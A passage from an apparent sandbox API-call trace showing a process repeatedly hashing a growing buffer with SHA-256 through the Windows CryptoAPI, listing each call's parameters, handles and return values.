Flags=0x8, Size=0x20) returned 0x32e87db0 [0187.573] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e87db0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87db0, pdwDataLen=0xce51c) returned 1 [0187.573] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0187.573] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0187.573] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0187.573] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.574] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.574] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.574] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87900 [0187.574] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32e87900, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87900, pdwDataLen=0xce51c) returned 1 [0187.574] CryptDestroyHash (hHash=0x3396f660) returned 1 [0187.574] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0187.574] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822dd0) returned 1 [0187.574] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.574] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x120, dwFlags=0x0) returned 1 [0187.574] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.574] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87a50 [0187.574] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32e87a50, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87a50, pdwDataLen=0xce51c) returned 1 [0187.574] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0187.574] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0187.574] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0187.575] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.575] CryptHashData (hHash=0x3396eb00, pbData=0x32348160, dwDataLen=0x140, dwFlags=0x0) returned 1 [0187.575] CryptGetHashParam (in: hHash=0x3396eb00, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.575] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87ea0 [0187.575] CryptGetHashParam (in: hHash=0x3396eb00, dwParam=0x2, pbData=0x32e87ea0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87ea0, pdwDataLen=0xce51c) returned 1 [0187.575] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0187.575] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0187.575] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338221d0) returned 1 [0187.575] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.575] CryptHashData (hHash=0x3396f740, pbData=0x32348160, dwDataLen=0x160, dwFlags=0x0) returned 1 [0187.575] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.575] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e881d0 [0187.576] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x2, pbData=0x32e881d0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e881d0, pdwDataLen=0xce51c) returned 1 [0187.576] CryptDestroyHash (hHash=0x3396f740) returned 1 [0187.576] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0187.576] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0187.576] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.576] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x180, dwFlags=0x0) returned 1 [0187.576] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.576] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87cf0 [0187.576] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e87cf0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87cf0, pdwDataLen=0xce51c) returned 1 [0187.576] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0187.577] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0187.577] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338227d0) returned 1 [0187.578] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.578] CryptHashData (hHash=0x3396f740, pbData=0x32348160, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0187.578] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.578] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88260 [0187.578] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x2, pbData=0x32e88260, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88260, pdwDataLen=0xce51c) returned 1 [0187.578] CryptDestroyHash (hHash=0x3396f740) returned 1 [0187.578] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0187.578] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338223d0) returned 1 [0187.579] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.579] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0187.579] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.579] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87d20 [0187.579] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e87d20, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87d20, pdwDataLen=0xce51c) returned 1 [0187.579] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0187.579] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0187.579] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0187.579] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.579] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0187.579] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.579] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87b10 [0187.579] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e87b10, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87b10, pdwDataLen=0xce51c) returned 1 [0187.582] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0187.582] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0187.582] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338227d0) returned 1 [0187.582] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.582] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x200, dwFlags=0x0) returned 1 [0187.582] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.582] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87f00 [0187.582] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32e87f00, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87f00, pdwDataLen=0xce51c) returned 1 [0187.582] CryptDestroyHash (hHash=0x3396f430) returned 1 [0187.582] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0187.583] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0187.583] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.583] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x220, dwFlags=0x0) returned 1 [0187.583] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.583] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e879f0 [0187.583] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e879f0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e879f0, pdwDataLen=0xce51c) returned 1 [0187.583] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0187.583] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0187.583] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0187.584] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.584] CryptHashData (hHash=0x3396f900, pbData=0x32348160, dwDataLen=0x240, dwFlags=0x0) returned 1 [0187.584] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.584] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e880e0 [0187.584] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x2, pbData=0x32e880e0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e880e0, pdwDataLen=0xce51c) returned 1 [0187.584] CryptDestroyHash (hHash=0x3396f900) returned 1 [0187.584] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0187.584] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0187.584] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.584] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x260, dwFlags=0x0) returned 1 [0187.584] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.584] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88290 [0187.584] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e88290, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88290, pdwDataLen=0xce51c) returned 1 [0187.585] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0187.585] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0187.585] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0187.585] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.585] CryptHashData (hHash=0x3396f740, pbData=0x32348160, dwDataLen=0x280, dwFlags=0x0) returned 1 [0187.585] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.585] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87ed0 [0187.585] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x2, pbData=0x32e87ed0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87ed0, pdwDataLen=0xce51c) returned 1 [0187.585] CryptDestroyHash (hHash=0x3396f740) returned 1 [0187.585] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0187.585] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822ed0) returned 1 [0187.586] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.586] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0187.586] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.586] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88050 [0187.586] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32e88050, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88050, pdwDataLen=0xce51c) returned 1 [0187.586] CryptDestroyHash (hHash=0x3396f660) returned 1 [0187.586] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0187.586] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0187.586] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.586] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0187.586] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.587] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88140 [0187.587] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32e88140, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88140, pdwDataLen=0xce51c) returned 1 [0187.587] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0187.587] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0187.587] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0187.587] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.587] CryptHashData (hHash=0x3396f190, pbData=0x32348160, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0187.587] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.587] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87ae0 [0187.587] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x2, pbData=0x32e87ae0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87ae0, pdwDataLen=0xce51c) returned 1 [0187.587] CryptDestroyHash (hHash=0x3396f190) returned 1 [0187.587] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0187.587] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822cd0) returned 1 [0187.588] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.588] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0x300, dwFlags=0x0) returned 1 [0187.588] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.588] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87750 [0187.588] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32e87750, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87750, pdwDataLen=0xce51c) returned 1 [0187.588] CryptDestroyHash (hHash=0x3396f660) returned 1 [0187.588] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0187.588] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0187.589] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.589] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0x320, dwFlags=0x0) returned 1 [0187.589] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.589] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e877b0 [0187.589] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e877b0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e877b0, pdwDataLen=0xce51c) returned 1 [0187.589] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0187.589] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0187.589] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823ad0) returned 1 [0187.589] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.589] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x340, dwFlags=0x0) returned 1 [0187.590] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.590] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87720 [0187.590] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e87720, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87720, pdwDataLen=0xce51c) returned 1 [0187.590] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0187.590] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0187.590] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0187.590] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.590] CryptHashData (hHash=0x3396f200, pbData=0x32348160, dwDataLen=0x360, dwFlags=0x0) returned 1 [0187.590] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.590] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87780 [0187.590] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x2, pbData=0x32e87780, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87780, pdwDataLen=0xce51c) returned 1 [0187.590] CryptDestroyHash (hHash=0x3396f200) returned 1 [0187.590] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0187.590] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338220d0) returned 1 [0187.591] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.591] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x380, dwFlags=0x0) returned 1 [0187.591] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.591] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e877e0 [0187.591] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32e877e0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e877e0, pdwDataLen=0xce51c) returned 1 [0187.591] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0187.591] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0187.591] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0187.592] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.592] CryptHashData (hHash=0x3396f270, pbData=0x32348160, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0187.592] CryptGetHashParam (in: hHash=0x3396f270, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.592] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e881a0 [0187.592] CryptGetHashParam (in: hHash=0x3396f270, dwParam=0x2, pbData=0x32e881a0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e881a0, pdwDataLen=0xce51c) returned 1 [0187.592] CryptDestroyHash (hHash=0x3396f270) returned 1 [0187.592] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0187.592] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0187.592] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.592] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0187.592] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.592] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87810 [0187.592] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32e87810, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87810, pdwDataLen=0xce51c) returned 1 [0187.592] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0187.592] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0187.592] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338226d0) returned 1 [0187.593] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.593] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0187.593] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.593] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e878d0 [0187.640] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e878d0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e878d0, pdwDataLen=0xce51c) returned 1 [0187.640] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0187.640] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0187.640] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338223d0) returned 1 [0187.641] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.641] CryptHashData (hHash=0x3396f740, pbData=0x32348160, dwDataLen=0x400, dwFlags=0x0) returned 1 [0187.641] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.641] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87a20 [0187.641] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x2, pbData=0x32e87a20, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87a20, pdwDataLen=0xce51c) returned 1 [0187.641] CryptDestroyHash (hHash=0x3396f740) returned 1 [0187.641] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0187.641] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338220d0) returned 1 [0187.642] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.642] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0x420, dwFlags=0x0) returned 1 [0187.642] CryptGetHashParam 